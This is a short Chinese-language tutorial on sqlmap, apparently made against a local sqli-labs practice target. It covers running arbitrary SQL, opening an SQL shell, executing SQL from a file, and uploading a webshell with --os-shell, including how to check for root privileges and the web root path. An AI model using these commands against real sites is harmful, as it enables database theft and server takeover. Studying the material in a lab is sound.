执行指定sql语句
- 命令
- --sql-query="sql语句"
- 示例
- sqlmap.py -u "http://127.0.0.1/sql/Less-1?id=1" --sql-query="select @@version"
- sqlmap.py -u "http://127.0.0.1/sql/Less-1?id=1" --sql-query=""select database()"
执行命令行
- 命令
- --sql-shell
- 示例
- 执行sqlmap -u "http://127.0.0.1/sql/Less-1?id=1" --sql-shell后的界面
- 执行一些获取数据库信息的命令
执行文件中的sql语句
- 命令
- --sql-file=路径
- 示例
- sqlmap.py -u "http://127.0.0.1/sql/Less-1?id=1" --sql-file=e:/1.sql
获取webshell
- 命令
- --os-shell
- 原理
SQLmap向根目录上传两个shell,一个负责文件上传,一个负责执行系统命令,并将结果返回出来 - 使用条件
- 网站是root权限
- 攻击者要知道网站的绝对路径
- php主动转义的功能关闭
- 示例
- 数据库权限是否为root权限
命令为 --is-dba
结果为Ture,代表是Root权限 - 网站的绝对路径
使用命令--sql-query="select @@datadir"
我们可以确定绝对路径为:d:/phpstudy_pro/www
其他确定绝对路径的方法:https://blog.csdn.net/hardhard123/article/details/80062733 - 转义功能是否关闭
主要由magic_quotes_gpc函数决定,这个函数在5.3版本被废弃了。
在变量上输入'、“、等会被加上反斜线,说明转义功能是开启的 - 连接shell
输入命令--os-shell
提示你选择web服务器对应的web语言
提示你选择什么样的路径:我们选择绝对路径
提示你输入绝对路径
执行对应系统的命令